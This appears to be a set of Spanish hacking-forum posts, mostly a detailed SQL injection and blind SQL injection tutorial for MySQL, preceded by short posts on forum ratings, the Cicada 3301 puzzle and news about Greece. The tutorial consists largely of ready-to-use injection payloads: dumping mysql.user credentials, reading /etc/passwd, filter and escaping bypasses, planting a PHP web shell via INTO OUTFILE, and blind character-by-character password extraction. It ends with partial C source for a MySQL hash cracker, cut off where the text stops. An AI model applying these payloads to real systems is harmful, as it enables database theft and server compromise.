Bueno, a toda la comunidad de elhacker.net les o propongo, un nuevo sistema de mensajes/respuestas optimizado, lo que contaremos aquí es como tratar a la información para la mejor dispocición, (¿disponibilidad?) del foro, lo que os contare se tratara de puntuar.
Hay que implementar un método/sistema para puntuar las respuestas en el foro, como 5 estrellas y el porcentaje en votos, así llamaremos a las respuestas mas optimizadas para las preguntas más relevantes, digamos que no hace falta llenar la base de datos con .. (estupideces?) , no lo implementaremos en todo el foro, pero si en algúnos de ELLOS, como Hacking General/Hacking avanzado. así los visitantes se llevaran: la mejor información calificada evitando las respuestas desvirtuadas o el mismísimo spam.

Atte.
#16
Para los curiosos y valientes se nos presenta un reto único. este reto más alla de ser algo técnico se ofrece como un viaje espiritual y místico. Todo lo relacionado a lo esotérico aquí entra, podremos decir que pocos son los elegidos, bueno es una competencia por nada más ni nada menos que el poder y el conocimiento, el destino de nuestra alma esta en juego, no se requiere mucho, pero si una mente analítica, compleja y racional. El premio aunque desconocido pretende ser como ningún otro, un tesoro invaluable y la posibilidad de también ser uno de los mejores del mundo. Me pregunto, ¿estas a la altua del reto? ¿eres uno de las personas más inteligentes? ¿eres tu uno de los que van a salvarse?, dejemos las tonterias de lado, este reto es algo serio, pues si crees poder resolverlo bien entra!, si cress que es una tontería para nerd, geek pues resuelvelo, nada más podremos decir por aquí.



Todo surgio hace algúnos años .. una misteriosa imágen aparecío en un tablón de internet muy reconocido, un reto complejo estaba propuesto, desde entonces muchas especulaciones y curiosidades giraron en torno al tema, si existen los resolvedores aún se desconoce, pero si es algo extraño y complejo: es aparentemente un reto para criptógrafos (aunque muchos lo han intentado). En los últimos años, las misterosas imágenes han seguido apareciendo;Muchas teorías especulan que se trata de una sociedad secreta o la NSA misma en busca de reclutas talentosos, nada esta claro, lo que si sabemos es que ha sido prohibido en algunos países y por tratarse de una organización presuntamente siniestra con fines malévolos como el terrorismo, la extorsión, el secuestro, la piratería.


la primera imágen en cuestión es esta:





fue publicada en twitter y el primer analisis forense de la misma ha exhibido algunos metadatos y cadenas hexadecimales con una dirección TOR, algúnas pistas falsas también se implementan, pero han logrado alcanzar por así decirlo, el nivel dos.


Este reto se llama



cicada 3301



Los interesados en el en cuestión dirigirse a una web de resolvers:

uncovering- cicada.wikia.com
uncovering- cicada.wikia.com
uncovering- cicada.wikia.com
uncovering- cicada.wikia.com
uncovering- cicada.wikia.com


El reto todavía sigue vigente.



* http://en.wikipedia.org/wiki/Cicada_3301
* http://www.minutouno.com/notas/310007-cicada-3301-el-misterioso-acertijo-que-solo-hackers -pueden-descifrar
* http://www.telegraph.co.uk/technology/internet/10468112/The-internet-mystery-that-has-the -world-baffled.html
* http://www.taringa.net/posts/offtopic/17377614/Cicada-3301-estas-a-la-altura-del-reto.html

-----------------------------------------

Bueno yo estoy interesado, si alguién más lo considera podría contactarme.
#17
Que opinan de lo que esta sucediendo en Grecia? no se si alguno de ustedes se entero lo que dijo la directora del FMI ("me importa más las familias del África" en medio del conflicto ..) donde muchos indignados dijieron "Si tanto le interesa África, piérdase allí y déjenos a nosotros en paz", "Si no pagamos es por que no  hay plata", que opinan que hable esta persona perteneciendo al club de los super-ricos millonarios? de capitalistas sin alma? tipos religiosos falsos? o Bono de U2 hablar del hambre y siendo parte del club de los millonarios?

en fín lo sintetizo a charlar sobre las siguientes noticias:

Increíbles palabras de Neil Armstrong .. Protesta contra el Papa por la desaparición de Emanuela Orlandi, se ha quedado en silencio .. (se esta creando una nueva babèl expreso ..) .. El cardenal Carlo Maria Martini dice "también Jesús fue traicionado y vendido y que ahora el Papa ha sido víctima de una acción malvada" .. Miiles de Griegos indignados con las palabras de la directora para que paguenlos impuestos y que le interesa màs las familias del África, algunos de ellos expreso: "Si tanto le interesa África, piérdase allí y déjenos a nosotros en paz", "Si no pagamos es por que no hay plata"
#18
+--------------------------------------------------------+
|                                                                   |
|      SQL injection && Blind Sql Injection      |
|                                                                   |
|                   Escrito por l0ve              |
|                                                                   |
+--------------------------------------------------------+

¿Qué es sql injection?

"Inyección SQL es una vulnerabilidad informática en el nivel de la validación de las entradas a la
base de datos de una aplicación. El origen es el filtrado incorrecto de las variables utilizadas en las
partes del programa con código SQL. Es, de hecho, un error de una clase más general de
vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o de script que esté
incrustado dentro de otro.
Una inyección SQL sucede cuando se inserta o "inyecta" un código SQL "invasor" dentro de otro
código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el código
"invasor" en la base de datos."

Fuente:
http://es.wikipedia.org/wiki/Inyección_SQL

¿Qué vamos a ver?

Vamos a buscar, reconocer y explotar de distintas formas "inyecciones SQL" en aplicaciones web con bases de datos MySQL version 4.x o 5.x ..

aclaración: Algunas cosas explicadas acá puede ser que no funcionen en otras base de datos ya que no todas son iguales, hay variedades de ellas ... mysql, mssql (sql server), sqlite, oracle etc ..

Antes de empezar vamos a repasar algunas cosas básicas:

? enlaza la URL con los parámetros.
& delimita donde termina un parámetro y donde comienza el otro.
= asigna el valor.

Recuerda bien ;).

Empecemos ...

Nota: En los ejemplos voy a usar siempre "localhost" y un script en php llamado "print.php"


¿Cómo reconocer una vulnerabilidad sql?

Hay varias formas de hacerlo, entre ellas puede ser usando una comilla simple ` (``%27``) al
final de la URL:

http://localhost/print.php?id=332`

también con:

- paréntesis ")"
- "comentarios" como ``/*`` , ``--`` o "#"
- palabras del lenguaje sql como "select,order by" etc ..

Ejemplos:

http://localhost/print.php?id=12) --
http://localhost/print.php?id=12)) --
http://localhost/print.php?id=12 `--
http://localhost/print.php?id=12 `) --
http://localhost/print.php?id=12 `)) --

veamos:





el tema con los "comentarios" es que puede ser que con un tipo de comentario funcione y con el otro no .. por ejemplo:

Con /*:




Con --:





además de los ejemplos anteriores se pueden usar "operadores lógicos" ..

ejemplo:

http://localhost/print.php?id=1 and 1=1

Y luego:
                                       
http://localhost/print.php?id=1 and 1=2

vemos que al hacer la primera inyección la pagina se imprime normalmente ... pero al inyectar lo
segundo vemos que se devuelve modificada (a veces vacía o falta algún contenido, se notara la diferencia).
Si al hacer algunas de estas inyecciones obtenemos algo como: "You have an error in your SQL
syntax; check the manual that " o algo parecido .. sabemos que es vulnerable a
sql injection.








No solo se puede usar "AND" existen otros operadores lógicos:

1 && 1 //Representa el AND
1 || 1 //Representa el OR
1 XOR 0 //Retorna null si alguno de ellos es null
! //Representa NOT se evalúa 1 si el operando es 0 y a 0 si el operando es distinto a 0.


Explorando la base de datos

Vamos a averiguar el numero de columnas ...

¿Cómo hacemos eso? ¡Fácil!, usamos el `order by` e iremos incrementando o viceversa según los
resultados veamos.

http://localhost/print.php?id=-1 order by 1/* <---- no muestra un error
http://localhost/print.php?id=-1 order by 2/* <---- no muestra un error
...
http://localhost/print.php?id=-1 order by 14/* <-------- no muestra un error
http://localhost/print.php?id=-1 order by 15/* <-------- no muestra un error
http://localhost/print.php?id=-1 order by 16/* <-------- no muestra un error
http://localhost/print.php?id=-1 order by 17/* <-------- error

Cuando hay un error nos mostrara algo así:

"Unknown column `17` in `order clause"

Como podemos ver hay 16 columnas.








Pero hay veces que esto no es posible y tendremos que usar UNIÓN
(Sentencia UNIÓN:
Se usa
para combinar los resultados de varias sentencias SELECT en un único conjunto de resultados.)

http://localhost/print.php?id=-1+union+all+select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

Ahí la pagina nos puede imprimir unos números o tal vez puede verse que falta de algún contenido pero
sabremos que la unión funciona .. también podemos hacer:

union all select 1/*
union all select 1,2/*
union all select 1,2,3/*
..
y así sucesivamente hasta encontrar la cantidad de columnas.


Saber la versión de mysql y entre otros datos útiles

Bueno ahora analicemos la inyección de más arriba ..

http://localhost/print.php?id=-1+union+all+select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

Como pueden ver no explique el -1 .. no quiere decir que siempre hay que ponerlo .. pueden usar cualquier numero.


Lo que hay que hacer ahora es reemplazar alguno de esos números por inyecciones que nos pueden dar algunos datos del servidor (estos números corresponde a una columna de la tabla).

Versión:

http://localhost/print.php?id=-1+union+all+select 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16/
*

(se pude usar @@version o version())

Ejemplo:




(se pude usar @@version o version())

Tendrás algo como "4.1.20-log"

Los @@ son variables del sistema,por ejemplo podríamos hacer algo como @@servename.

Es importante saber la versión de MySQL ya que podría facilitarnos la inyección ..

version() Devuelve la versión del servidor MySQL.
database() Devuelve el nombre de la base de datos actual.
current_user() Devuelve el nombre de usuario y el del host para el que está autentificada la
conexión actual. Este valor corresponde a la cuenta que se usa para evaluar los privilegios de
acceso. Puede ser diferente del valor de USER().
last_insert_id() Devuelve el último valor generado automáticamente que fue insertado en una
columna AUTO_INCREMENT.
connection_id() Devuelve el ID de una conexión. Cada conexión tiene su propio y único ID.
@@datadir directorio de la db.

un problema frecuente .. ¿Por qué me dice que es ilegal, implícita etc ..?

ok .. para evitarlo se hace de la siguiente forma:

con la función convert().

http://localhost/print.php?id=-1+union+all+select 1,convert(@@version using
latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

con hex() y unhex():

http://localhost/print.php?id=-1+union+all+select
1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

aes_encrypt & aes_decrypt

http://localhost/print.php?id=-1+UNION+SELECT+1,2,3,aes_decrypt(aes_encrypt(user,1),1),5+from+mysql.user--

COMPRESS , UNCOMPRESS

http://localhost/print.php?id=-1+UNION+SELECT+1,2,3,UNCOMPRESS(COMPRESS(user)),5+from+mysql.user--


Bueno hasta acá ya tenemos bastantes datos interesantes sobre el servidor y ademas sabemos si es vulnerable o no .. sigamos.


Algunas veces nos podemos encontrar con filtros que nos lian las inyecciones, pero hay varias forma de "saltarlos" por ejemplo:


http://localhost/print.php?id=-1/**/union/**/all/**/select/**/1,unhex(hex(@@versión)),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

http://localhost/print.php?id=-1/**/uNion/**/aLl/**/sElEcT/**/1,unhEx(hex(@@versión)),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*




Obteniendo tabla,nombre de columna y otros datos

Vamos a ver como hacer al tener una versión 5 de MySQL:

Para tener una lista de los privilegios podemos hacer:

http://localhost/print.php?id=-1+union+all+select+1,concat(grantee,privilege_type,is_grantable),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.user_privileges/*

hay algo nuevo y es CONCAT (concat une datos dentro de una consulta sql).
Con esto nos ahorraríamos de hacer inyecciones ..

si algún dato no existe en la base de datos "concat" produce un error .. y si no hay contenido larga NULL.

pero todo sale muy junto? ..¿Cómo podemos evitar esto?

Podemos pasar algún carácter a hexadecimal o usando char() (pasando el valor a ascii).

http://localhost/print.php?id=-1+union+all+select+1,concat(grantee,0x3a,privilege_type,0x3a,is_grantable)3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.user_privileges/*

Vemos que 0x3a es un valor en hex y representa ":"

Entonces obtendremos algo así:

``primerdato:segundodato`` y no ``primerdatosegundodato``

Y así con cualquier carácter por ejemplo "=" en hexa (0x3D) Obtendríamos:

``primerdato=segundodato``

Y en ascii:

http://localhost/print.php?id=-1+union+all+select+1,concat(grantee,char(58),privilege_type,char(58),is_grantable)3,4,5,6,7,8,
9,10,11,12,13,14,15,16+from+information_schema.user_privileges/*

Ejemplo:




y ..




Como podemos ver en la segunda imagen aparece unos : (dos puntos)

o con char():




como podemos ver lo separamos con ^.

Nota: Para saber los valores ascii: http://www.ascii.cl/es/

o Sencillo script en perl para pasar una cadena de caracteres a HEX:

print "Enter string to encode:";
$str=<STDIN>;chomp $str;
$enc = encode($str); print "Hex Encoded value: 0x$enc\n";
sub encode{ #Sub to encode
@subvar=@_;
my $sqlstr =$subvar[0];
@ASCII = unpack("C*", $sqlstr);
foreach $line (@ASCII) {
$encoded = sprintf(`%lx`,$line);
$encoded_command .= $encoded;
}
return $encoded_command;
}


Tambien podemos usar concat_ws() (concat_ws() que utiliza el primer argumento para separar el resto:




o aprovechar los numeros que devuelve la página para poner en ellos algo diferente por ejemplo:




como ven muestra la base de datos,la tabla y la columna.

en este caso blog es la base .. blog_lb_authors es la tabla y id es la columna.



Bueno seguimos ..

otras formas para obtener una lista de privilegios:

http://localhost/print.php?id=-1+union+all+select+1,concat(host,0x3a,user,0x3a,Select_priv,0x3a,Insert_priv,0x3a,Update_pri
v,0x3a,Delete_priv,0x3a,Create_priv,0x3a,Drop_priv,0x3a,Reload_priv,0x3a,Shutdown_priv,0x3a,P
rocess_priv,0x3a,File_priv,0x3a,Grant_priv,0x3a,References_priv,0x3a,Index_priv,0x3a,Alter_priv,
0x3a,Show_db_priv,0x3a,Super_priv,0x3a,Create_tmp_table_priv,0x3a,Lock_tables_priv,0x3a,Exe
cute_priv,0x3a,Repl_slave_priv,0x3a,Repl_client_priv),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+m
ysql.user--

http://localhost/print.php?id=-1+union+all+select+1,concat(grantee,0x3a,table_schema,0x3a,privilege_type),3,4,5,6,7,8,9,10,
11,12,13,14,15,16+FROM+information_schema.schema_privileges--
http://localhost/print.php?
id=-1+union+all+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name,0x3a,privileg
e_type),3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+information_schema.column_privileges--

una lista sobre las base de datos:

http://localhost/print.php?id=-1+union+all+select+1,schema_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+information_s
chema.schemata--

http://localhost/print.php?id=-1+union+all+select+1,distinct(db),3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+mysql.db--

una lista de columnas:

http://localhost/print.php?
id=-1+union+all+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9,
10,11,12,13,14,15,16+FROM+information_schema.columns--

También se puede leer algún archivo local como "/etc/passwd":

http://localhost/print.php?id=-1+union+all+select+1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9,10,11,12,13,14,15,1
6--

El /etc/passwd esta en hex.

Ejemplo:




o obtener un user y pass de la db para poder acceder remotamente a ella:

http://localhost/print.php?id=-1+union+all+select+1,concat(host,0x3a,user,0x3a,password),3,4,5,6,7,8,9,
10,11,12,13,14,15,16+FROM+mysql.user--

Ejemplo:




nos imprimio el host,el usuario y por supuesto el password .. ahora lo que nos queda es crackear el
hash (pueden usar john the ripper etc ..) y controlar si esta abierto el puerto 3306.

Ejemplo:




y podernos conectar remotamente:




buscando cosas interesantes:





Nota: se puede usar cualquier cliente mysql en este caso uso la c99.


Una forma para intentar buscar nombres de columnas:

Buscando algún nombre de tabla .. en este caso largo auth ..

http://localhost/print?id=-1 union all select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from
information_schema.tables where table_schema = database()

Pasando valor a ascii y buscando ..

http://localhost/print.php?id=-1 union all select 1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16
from information_schema.columns where table_name = char(97,117,116,104) and column_name
like char()

Pasar en ascii "%a%" quedando:

http://localhost/print.php?id=-1 union all select 1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16
from information_schema.columns where table_name = char(97,117,116,104) and column_name
like char(37,97,37)

En esta inyección por ejemplo estaríamos buscando un nombre de columna pasadas en ascii.
Y ahí te larga palabras y luego obtener datos :)

Sacando demàs tablas,columnas etc .. de la base:

Bueno hay algunas veces que al hacer una inyeccion y hacer algo asi:

-1 union all select table_name from information_schema.tables

obtendremos todas todas las tablas impresas de una sola vez .. pero otras veces no ..

por ejemplo:




Como podemos ver tira todas las tablas .. en cambio en esta no:





Asi que para ver la siguiente tabla usaremos limit al final de la url ejemplo:

-1 union all select 1,2,3,4,5,6 from information_schema.tables limit 1,1--

Ejemplo:




como podemos ver saco la siguiente tabla .. solo nos quedaria incrementar limit ..

-1 union all select 1,2,3,4,5,6 from information_schema.tables limit 2,1--
-1 union all select 1,2,3,4,5,6 from information_schema.tables limit 3,1--
..
-1 union all select 1,2,3,4,5,6 from information_schema.tables limit 15,1--

etc .. entendido? Ok, esto del limit lleva mucho tiempo .. por que saca datos de toda la base de datos
al menos que evitemos lo que no queremos ver :P ejemplo ..

en mysql existen 2 base de datos una se llama information_schema  y la otra mysql .. (Instalen mysql y exploren lo que hay dentro de ellas)

pero si de verdad necesitamos evitarlas con el fin de encontrar algun password de algun panel de administracion etc .. podemos hacer algo asi:

1+union+all+select+1,2,concat(table_schema,0x3a,table_name,0x3a,column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.columns+WHERE+table_schema!=0x6d7973716c+AND+table_schema+!=0x696e666f726d6174696f6e5f736368656d61+limit+100,1--

como podemos ver .. pase information_schema y mysql a HEX logrando que evite buscar alguna informacion en ellas.

aparte de usar limit podriamos usar group_concat() lo que haria es largar nombres de tabla pero no todas ejemplo:




y para evitar el tema de que aparezca todo junto podriamos hacer algo asi:




como podemos ver puse: 0x3C62723E que seria un salto de linea en html osea <br>.


TUTORIAL DE PonyMagic

  • Como muchos saben, con Group_concat(), el límite es de unos 250 caracteres, por eso al printear un concateo relativamente grande "se corta" hoy les voy a mostrar 2 formas para estirar esos 250 caracteres, una muy simple, y la otra... masomenos :P

  • El 1er Semitip` que tengo, es que cuando usen Group_concat(), realizen un cast() al objeto y lo hagan una variable CHAR. con esto aumentamos la cantidad de caracteres a 1024 que es el seteado group_concat_max_len (inmodificable desde una inejct) . También, para los que setean el delimitador dentro del group, les recomiendo replazar "," por "<br>" luego con replace(). Sino, estamos gastando esos valiosos 1024chars, esto es lo máximo que sacaremos de un solo select con group_concat:

    Replace(Group_concat(Cast(Table_Name AS CHAR)),0x2c,0x3c62723e)

  • hasta ahí vamos a poder llegar con group_concat, pero también voy a "enseñar" una forma para realizar un "limit casero" en el concateo :) supongamos que tenemos esta inject:

    id=1 and 1=2 union select 1,2,3,4--

  • lo 1ro que vamos a hacer, es un select pidiendo las tablas a information_schema.

    id=1 and 1=2 union select 1,(
    Select
    Replace(Group_concat(Cast(Table_Name AS CHAR)),0x2c,0x3c62723e)
    from information_schema.tables
    ),3,4--




  • Lo que nos devolvería los 1ros 1024chars del concateo. Ahora con este "limit casero" vamos a crear una query que pida los siguientes 1024 caracteres. Para eso vamos a usar la funcion INSTR()


    id=1 and 1=2 union select 1,(
    Select
    Replace(Group_concat(Cast(Table_Name AS CHAR)),0x2c,0x3c62723e)
    from information_schema.tables

    Where

    INSTR(
    (Select Group_concat(Cast(Table_Name AS CHAR)) from information_schema.tables),
    Table_Name
    ) = 0

    ),3,4--



  • Con esto ya tenemos 3072 chars, algo asi como ... 205 resultados ( si fueran de al rededor de 15chars c/u ) en solo 3 consultas. sino, tendríamos que haber realizado 205 consultas modificando el limit de 1 en 1...

  • Bueno, por ahora solo eso, porximamente talvez haga algo en JS que edite el link y eso para tener una inject modelo con un botoncito siguiente =P






    FIN TUTO (Gracias por esta info, de verdad muy valiosa.)

    Link blog PonyMagic: http://ponymagic.diosdelared.com



    En versiones MySQL 4 o sin permiso para information_schema la unica forma de obtener tablas y columnas es adivinándolas ..

    por ejemplo:

    http://localhost/print.php?id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
    from admin--  > error

    http://localhost/print.php?id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
    from adm--    > error

    http://localhost/print.php?id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
    from administrador--  > válido

    y de la misma forma para columnas:

    http://localhost/print.php?id=-1 union all select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16
    from administrador--  > error

    http://localhost/print.php?id=-1 union all select 1,pwd,3,4,5,6,7,8,9,10,11,12,13,14,15,16
    from administrador--  > error

    http://localhost/print.php?id=-1 union all select 1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16
    from administrador--  > válido



    ¿Para qué podría servir todo esto?

    Desde leer archivos de configuraciones, archivos en si, etc .. solo es
    cuestión de imaginación como por ejemplo obtener una shell del servidor haciendo algo como:

    UNION SELECT "<? system($_REQUEST[`cmd`]); ?>",2,3,4 INTO OUTFILE
    "/var/www/html/mishell.php" --

    por ejemplo: (Una vez echa la inyeccion)




    y usando la shell:



    Lo que estaríamos haciendo es metiendo el contenido de un script en php y guardándolo en alguna parte
    del servidor.

    si necesitan la ruta del servidor pueden verla en /etc/passwd ejemplo:

    apache:x:48:48:Apache:/var/www:/sbin/nologin

    en el httpd.conf:

    /etc/httpd/conf/httpd.conf

    (la ruta varia)

    viendo el code de alguna web del servidor .. como index.php,noticias.php o cualquiera.

    o usar alguna tecnica como Full Path Disclosure:

    http://www.owasp.org/index.php/Full_Path_Disclosure

    Para hacer esto y algunas inyecciones más,necesitamos saltarnos las magic_quotes que son las que no
    nos dejan hacer nuestras inyecciones con eficiencia :P para eso existen algunas formas ..

    Como el "double encoding" bastante interesante y leer

    (http://www.owasp.org/index.php/Double_Encoding)

    hex encoding

    para saltar filtros como las magic_quotes leer sobre "SQL Smuggling".

    También como he leído por ahí .. podríamos saltar algunos de los filtros que posee PHP veamos:
    -------------------------------------------------------
    (MySQL 4.1.x o posterior: 4.1.20 y 5.0.x)
    bypass a addslashes() con codificaciòn GBK
    WHERE x = 0xbf27admin 0xbf27
    -------------------------------------------------------
    bypass mysql_real_escape_string() con BIG5 o GBK
    se pueden poner caracteres chinos no hemos puesto el ejemplo por problemas de codificacion
    pero es posible saltarse el mysql_real_escape() de esta forma.
    aparte de ser caracteres chinos es BIG5 :P
    -------------------------------------------------------
    Vectores avanzados:

    Usando HEX para bypassear una consulta:

    Consulta normal:

    SELECT * FROM login WHERE user = `root`

    Bypass:

    SELECT * FROM login WHERE user = 0x726F6F74

    Insertando nuevo usuario en SQL.


    Consulta Normal:
    insert into login set user = 'root', pass = 'root'

    Bypass:

    insert into login set user = 0×726F6F74, pass = 0×726F6F74
    --------------------------------------------------------
    Como determinar el HEX? bueno se puede usar el programita de perl màs arriba o simplemente haciendo
    algo como:

    SELECT HEX(`root`);
    obtendremos algo como:
    726F6F74
    y luego le agregamos:
    0x
    quedaría: 0×726F6F74

    Tambien hace poco me encontre un articulo interesante del amigo xianur0 :P:

    http://xianur0.blogspot.com/2008/10/rootear-servidor-mediante-sql-injection.html

    seria bueno que lo lean.

    Para ver si las magic_quotes estan activadas simplemente agreguen una ` (comilla siemple) si aparece algo asi:

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near `\`` at line 1

    es que no es posible por que aparece una barra invertida provocando un error en la base de datos ..

    pero si aparece algo asi:

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ``` at line 1

    sabremos que no pasa nada con la comilla simple y tendremos màs posibilidades .. y inyecciones no tan complejas  ademàs de poder actualizar datos,borrar etc ..

    Ahora blind sql injection

    es un poco más liado .. pero aquí va:

    Sabiendo si es vulnerable a Bsql

    Tenemos que saber esto:

    http://localhost/print.php?id=-1 and 1 = 1 <--- esto siempre sera verdadero.
    http://localhost/print.php?id=-1 and 1 = 2 <--- esto siempre sera falso.

    Nota: Recordarlo siempre.

    Si luego de probar http://localhost/print.php?id=-1 and 1 = 2 no regreso algo de la pagina, un texto o
    etc sabemos que es vulnerable a bsql.
                                                 
    Sabiendo la versión de mysql:

    http://localhost/print.php?id=-1 and substring(@@versión,1,1)=4 <--- si nos larga la pagina normal
    (si es verdadero) sera versión 4.

    http://localhost/print.php?id=-1 and substring(@@versión,1,1)=5 <--- si nos larga la pagina normal
    (si es verdadero) sera versión 5.

    Podemos usar select pero si tenemos problemas podremos usar subselect.

    http://localhost/print.php?id=-1 and (select 1 from mysql.user limit 0,1)=1

    Si nos larga verdadero tendremos acceso a mysql.user y podremos obtener ficheros del servidor
    como /etc/password y etc ... usando load_file() y outfile.

    Buscando nombre de tabla y columna

    Puede ser difícil y con ganas de cagarte en muchas cosas xD.

    Adivinando la tabla:

    Hacemos esto:

    http://localhost/print.php?id=-1 and (select 1 from members limit 0,1)=1

    Nota: con LIMIT 0,1 nuestra consulta devuelve 1 fila de datos por causa de subselect por eso es
    importante. RECODARLO

    Si la pagina carga normalmente sabremos que el nombre de la tabla es la correcta si esto no es así
    tendremos que seguir adivinando.

    Ahora la columna:

    http://localhost/print.php?id=-1 and (select substring(concat(1,password),1,1) from members limit
    0,1)=1

    Si la pagina carga normalmente sabremos que es la correcta de lo contrario a adivinar /* :@ */

    Extrayendo datos

    Supongamos que ya tenemos nombre de la columna y la tabla:

    http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),1,1))>80

    El 80 es un carácter en ascii si nos da falso tenemos que aumentar hasta que de verdadero.

    http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),1,1))>95

    Da falso así que incrementamos.

    http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),1,1))>95
    http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),1,1))>98

    Nos da falso.

    http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),1,1))>99

    Verdadero!

    Por lo que el primer carácter en el nombre de usuario es char(99). Y convirtiéndolo a ascii sabemos
    que char (99) es la letra c.

    Entonces vamos a comprobar el segundo carácter:

    http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),2,1))>99

    Fíjense que estoy cambiado, a 1,1, 2,1 para obtener el segundo carácter, ahora vuelve el segundo
    carácter, 1 carácter de longitud.

    http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),2,1))>99

    Nos da falso e incrementamos:

    http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),2,1))>107

    Nos da falso y buscamos un numero menor.

    http://localhost/print.php?id=5 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),2,1))>104

    Falso, incrementamos ..

    http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),2,1))>105

    Verdadero!

    Sabemos que el segundo carácter es char(105) y que es ``i`` vamos ``ci`` y seguimos incrementando,
    cuando > 0 devuelve falso, sabemos que llegamos al final.


    Hay herramientas que hacen que esto no sea muy pesado:

    http://www.seguridadinformatica.es/profiles/blog/show?id=1024177%3ABlogPost%3A16301

    http://sqlmap.sourceforge.net < HERMOSA HERRAMIENTA :$

    Les recomiendo leer el tutorial que hizo ka0x que contiene un script donde podemos aplicar los
    conocimientos de aquí y el que he usado a lo largo del tutorial :).(http://www.milw0rm.com/papers/download/216)

    MySQL cheat sheet:
    http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

    MySQL cheat sheet: http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/  (Màs que interesante)

    La intencion de este tutorial es solo enseñar y evitar este tipo de vulnerabilidades ..
    no me responsabilizo de mal uso de esta información
    espero que les sirva!!

    TODA LA LECTURA ES OBLIGATORIA

    publiquen sus tips,errores o duda en esta publicación :).


    Saludos!

    ---------------------------------

    tools:

    el soft que use para descifrar el pass:

    mysqlfast.c

    /* This program is public domain. Share and enjoy.
    *
    * Example:
    * $ gcc -O2 -fomit-frame-pointer mysqlfast.c -o mysqlfast
    * $ mysqlfast 6294b50f67eda209
    * Hash: 6294b50f67eda209
    * Trying length 3
    * Trying length 4
    * Found pass: barf
    *
    * The MySQL password hash function could be strengthened considerably
    * by:
    * - making two passes over the password
    * - using a bitwise rotate instead of a left shift
    * - causing more arithmetic overflows
    */

    #include <stdio.h>

    typedef unsigned long u32;

    /* Allowable characters in password; 33-126 is printable ascii */
    #define MIN_CHAR 33
    #define MAX_CHAR 126

    /* Maximum length of password */
    #define MAX_LEN 12

    #define MASK 0x7fffffffL

    int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary)
    {
      int i, c;
      u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2;
      u32 newstate1, newstate2, newstate3;
      u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2];
      u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3];
      i = -1;
      sum = 7;
      state1_ary[0] = 1345345333L;
      state2_ary[0] = 0x12345671L;

      while (1) {
        while (i < stop) {
          i++;
          pass_ary[i] = MIN_CHAR;
          step_ary[i] = (state1_ary[i] & 0x3f) + sum;
          xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] << 8);
          sum += MIN_CHAR;
          state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
          state2_ary[i+1] = state2_ary[i]
            + ((state2_ary[i] << 8) ^ state1_ary[i+1]);
        }

        state1 = state1_ary[i+1];
        state2 = state2_ary[i+1];
        step = (state1 & 0x3f) + sum;
        xor1 = step*MIN_CHAR + (state1 << 8);
        xor2 = (state2 << 8) ^ state1;

        for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) {
          newstate2 = state2 + (xor1 ^ xor2);
          newstate1 = state1 ^ xor1;

          newstate3 = (targ2 - newstate2) ^ (newstate2 << 8);
          div = (newstate1 & 0x3f) + sum + c;
          diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK;
          if (diff % div != 0) continue;
          d = diff / div;
          if (d < MIN_CHAR || d > MAX_CHAR) continue;

          div = (newstate3 & 0x3f) + sum + c + d;
          diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK;
          if (diff % div != 0) continue;
          e = diff / div;
          if (e < MIN_CHAR || e > MAX_CHAR) continue;

          pass_ary[i+1] = c;
          pass_ary[i+2] = d;
